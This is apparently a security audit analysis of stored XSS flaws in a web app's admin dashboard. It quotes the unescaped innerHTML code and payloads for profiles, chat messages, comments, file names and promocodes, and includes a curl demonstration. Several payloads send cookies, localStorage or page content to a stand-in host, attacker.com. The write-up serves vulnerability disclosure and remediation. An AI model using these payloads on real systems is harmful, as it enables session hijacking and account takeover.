================================================================================
XSS VULNERABILITY EXAMPLES - DETAILED ANALYSIS
================================================================================

VULNERABILITY #1: PROFILE NAME/DESCRIPTION XSS
Location: Lines 617-645 in loadProfiles() function
Risk Level: CRITICAL

JavaScript Code:
    profileDiv.innerHTML = `
        <span class="profile-name">${profile.name}</span>
        <p><strong>Description:</strong> ${profile.description}</p>
    `;

Attack Payload:
    Profile Name: <img src=x onerror="alert('Admin Account Compromised'); fetch('http://attacker.com?admin_data='+btoa(document.body.innerHTML))">
    
Result When Admin Views Profiles:
    1. JavaScript payload executes in admin's browser
    2. Cookie/session tokens can be stolen
    3. Admin account can be compromised
    4. Malicious content can be injected into subsequent responses

Full Attack Flow:
    1. Attacker creates profile with malicious name via POST /api/admin/profiles
    2. Admin logs in and views profiles tab
    3. loadProfiles() fetches data via /api/admin/profiles (unprotected)
    4. JavaScript template inserts profile.name WITHOUT escaping
    5. Attacker's JavaScript executes in admin's browser session
    6. Session tokens, cookies, or form data can be extracted

================================================================================

VULNERABILITY #2: CHAT MESSAGE XSS  
Location: Lines 1083-1175 in openChat() function
Risk Level: CRITICAL

JavaScript Code (Line 1089):
    messagesHtml += `
        <div class="system-bubble">${msg.text}</div>
    `;

Also vulnerable in Line 1103, 1123, 1139, 1155:
    <div>${msg.text || ''}</div>

Attack Payload (as system message):
    <svg onload="new Image().src='http://attacker.com/steal?session='+document.cookie">
    
Or (file name injection):
    File: <script>eval(atob('YWxlcnQoJ1hTUycp'))</script>.pdf

Result When Admin Opens Chat:
    1. SVG loads and sends session cookie to attacker
    2. Attacker gains admin session access
    3. Can then delete profiles, modify crypto wallets, etc.

================================================================================

VULNERABILITY #3: COMMENT TEXT XSS
Location: Lines 1335-1343 in loadCommentsAdmin() function
Risk Level: CRITICAL

JavaScript Code:
    commentDiv.innerHTML = `
        <span class="comment-author">${comment.user_name}</span>
        <div class="comment-text">${comment.text}</div>
    `;

Attack: User submits comment with payload:
    User Name: Admin
    Comment: <img src=x onerror="document.location='http://attacker.com/phishing?data='+btoa(localStorage)">

Result:
    1. When admin views comments, page redirects to attacker's phishing site
    2. Attacker can harvest admin credentials
    3. Or perform other malicious actions

================================================================================

VULNERABILITY #4: INLINE EVENT HANDLER XSS
Location: Lines 1345, 1404, 1407, etc.
Risk Level: HIGH (requires specific input format)

JavaScript Code (Line 1345):
    <button onclick="deleteComment(${comment.profile_id}, ${comment.id})">

If comment.id = 1); alert('XSS'); // (injected via API):
    <button onclick="deleteComment(123, 1); alert('XSS'); //)">

Result:
    1. Clicking delete button executes alert AND the delete function
    2. More dangerous with malicious code instead of alert

================================================================================

VULNERABILITY #5: FILE NAME XSS
Location: Line 1138 in openChat() function
Risk Level: HIGH

JavaScript Code:
    <strong>File: ${msg.file_name}</strong>

Attack: Upload file with name:
    "<img src=x onerror="alert('XSS')">.pdf

Rendered as:
    <strong>File: "<img src=x onerror="alert('XSS')"></strong>.pdf

Result:
    1. Image tag executes onerror handler
    2. Admin compromise possible

================================================================================

VULNERABILITY #6: PROMOCODE XSS
Location: Lines 1393 in loadPromocodes() function
Risk Level: MEDIUM-HIGH

JavaScript Code:
    <span class="promocode-code">${promo.code}</span>

Attack: Create promocode with code:
    <svg onload="console.log('XSS in promocode')">

Result:
    1. SVG code executes when admin views promocodes
    2. More limited than others but still executable

================================================================================

DEMONSTRATION ATTACK SCENARIO:
================================================================================

Step 1: Attacker creates profile via POST /api/admin/profiles (NO AUTH REQUIRED)
    curl -X POST http://localhost:8002/api/admin/profiles \
         -F "name=<img src=x onerror=\"fetch('http://attacker.com?cookie='+document.cookie)\">" \
         -F "age=25" \
         -F "gender=female" \
         -F "nationality=Russian" \
         -F "city=Moscow" \
         -F "travel_cities=Moscow" \
         -F "description=<script>alert('XSS')</script>" \
         -F "height=165" \
         -F "weight=55" \
         -F "chest=3" \
         -F "photos=@image.jpg"

Step 2: Admin visits admin dashboard and clicks "Profiles" tab
    - loadProfiles() executes
    - Fetches /api/admin/profiles (unprotected)
    - JavaScript inserts profile.name into DOM via innerHTML
    - <img onerror> payload executes
    - Attacker's cookie stealing code runs
    - Admin's session token sent to attacker

Step 3: Attacker uses stolen session to:
    - Modify crypto wallet addresses to attacker's wallets
    - Delete all profiles
    - Modify banner to redirect users
    - Inject malware into chat messages
    - Steal other admin data

================================================================================

WHY THIS IS SEVERE:

1. NO AUTHENTICATION on ANY endpoint
   - Attacker doesn't need credentials to create malicious profiles
   - Can inject XSS payloads directly

2. UNESCAPED USER DATA
   - innerHTML uses template literals with user data directly
   - No textContent() usage
   - No HTML entity encoding
   - No Content Security Policy (CSP)

3. MULTIPLE INJECTION POINTS
   - Names, descriptions, comments, messages, file names
   - All vulnerable to same XSS attack

4. HIGH IMPACT
   - Admin account compromise
   - Full application control
   - Data theft
   - Cryptocurrency wallet manipulation
   - User data access

================================================================================
